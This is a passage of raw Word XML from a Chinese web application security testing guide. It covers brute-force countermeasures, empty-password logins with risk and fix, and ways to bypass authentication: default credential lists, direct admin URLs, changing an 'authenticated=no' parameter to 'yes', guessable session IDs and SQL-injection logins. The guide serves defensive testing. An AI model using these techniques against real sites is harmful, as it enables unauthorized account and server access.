    <w:p w14:paraId="4AD59224"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检查密码的时候适当的插入一些暂停，可以减缓攻击，但是可能对用户造成一定的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54440B"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封锁多次登录的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C36717"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这种方法也是有缺点的，因为攻击者可以定时更换自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40569208"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验证码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A13B59" w14:textId="4273772E" w:rsidR="00757422" w:rsidRDefault="00D61DBD" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34D4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码是阻止暴力攻击的好方法，但设计不好的验证码是可以绕过的，而且对于特定目标的手工探测来说验证码是没有作用的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B596986" w14:textId="7C55B545" w:rsidR="00DF1D95" w:rsidRPr="00D34D4A" w:rsidRDefault="00DF1D95" w:rsidP="00D34D4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简"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2D03AF86" w14:textId="2384B4B1" w:rsidR="00594DBB" w:rsidRPr="00AD537C" w:rsidRDefault="00594DBB" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc498434496"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证功能失效</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="401B53C8" w14:textId="57779B5C" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00D03834" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc498434497"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在空口令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="4472A4DA" w14:textId="0F7AF350"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0513F7" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证登录环节</w:t>
      </w:r>
      <w:r w:rsidR="007D2258" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许空</w:t>
      </w:r>
      <w:r w:rsidR="000513F7" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B0E3E"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p>
    <w:p w14:paraId="49E451B5" w14:textId="7E6BA2B9" w:rsidR="007D3EC8" w:rsidRPr="00AE2ACC" w:rsidRDefault="007D3EC8" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到网站登录页面，尝试输入</w:t>
      </w:r>
      <w:r w:rsidR="00A3149B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用用户名，密码为空进行登录</w:t>
      </w:r>
      <w:r w:rsidR="003F2675" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27176365" w14:textId="35F439D9"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t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00997FD7" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞登录网站后台，操作敏感数据，甚至上传</w:t>
      </w:r>
      <w:r w:rsidR="00997FD7" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00997FD7" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而控制服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474CEC90"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6D1C261A" w14:textId="104E82AA" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="007D2258"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危</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：存在空口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269CE47" w14:textId="35D00A89" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00B97351" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断输入密码是否为空，禁止空口令登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348451DB" w14:textId="594B271F" w:rsidR="00F019E9" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F019E9" w:rsidP="00AE2AC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12C82A1" w14:textId="60C63842" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00594DBB" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc498434498"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="67BECCA5" w14:textId="2091B73D"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F33A69" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够绕过应用认证，直接登录系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDD446" w14:textId="2EA466DD"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r w:rsidR="00DD5079" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过认证主要有几下几种途径：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DAA40" w14:textId="5D15679F" w:rsidR="00DD5079" w:rsidRPr="00AE2ACC" w:rsidRDefault="00DD5079"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网络嗅探。通过网络嗅探工具探测局域网中传输的明文用户名和密码。有些应用程序采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式发送登录请求，可能导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求内容被缓存在代理服务器活着</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端，导致用户名和密码泄漏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF2E0E" w14:textId="17023F4F" w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC" w:rsidRDefault="00A45C13"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默认或可猜测的用户账号。</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数开源软件或商业软件提供的基于网络配置和管理</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>的接口，通常都会有一些默认的用户名和密码。例如，一般默认的用户名是：</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，而默认的秘密吗也根据硬件和软件的不同而不同，可尝试一下这些密码：</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:r w:rsidR="00E30AE5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C84398" w14:textId="54BEBCD7" w:rsidR="00780C05" w:rsidRPr="00AE2ACC" w:rsidRDefault="00780C05"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直接访问内部</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00454A21" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00454A21" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spider</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具找到含有</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等词语的路径，尝试使用普通的登录用户访问这些</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00EC0E65" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。从而获得管理员的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45604BE4" w14:textId="4FCBD065" w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC" w:rsidRDefault="002C53D3"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修改参数绕过认证。</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序可能会会使用一个参数或一个隐藏的域表示一个用户是否经过验证了，通过修改这些参数，从而被认为是已经认证过的用户。例如：</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>://www.xxx.xom/userinfo.jsp?authenticated=no</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过修改</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>://www.xxx.xom/userinfo.jsp?authenticated=</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="00DE42AD" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后就可以通过认证，直接访问内部页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C7B448" w14:textId="250EE8CC" w:rsidR="006012DB" w:rsidRPr="00AE2ACC" w:rsidRDefault="00390BC5"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可猜测的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。利用规律，猜测到一个有效的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后通过修改请求中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为一个预测到的有效的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而冒充会话的真正拥有着，绕过认证环节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48058F3C" w14:textId="67624DAA" w:rsidR="006012DB" w:rsidRPr="00AE2ACC" w:rsidRDefault="006012DB"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注入问题。利用万能密码登录系统，绕过认证环节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7C08B" w14:textId="0F243DF1" w:rsidR="006012DB" w:rsidRPr="00AE2ACC" w:rsidRDefault="006012DB" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
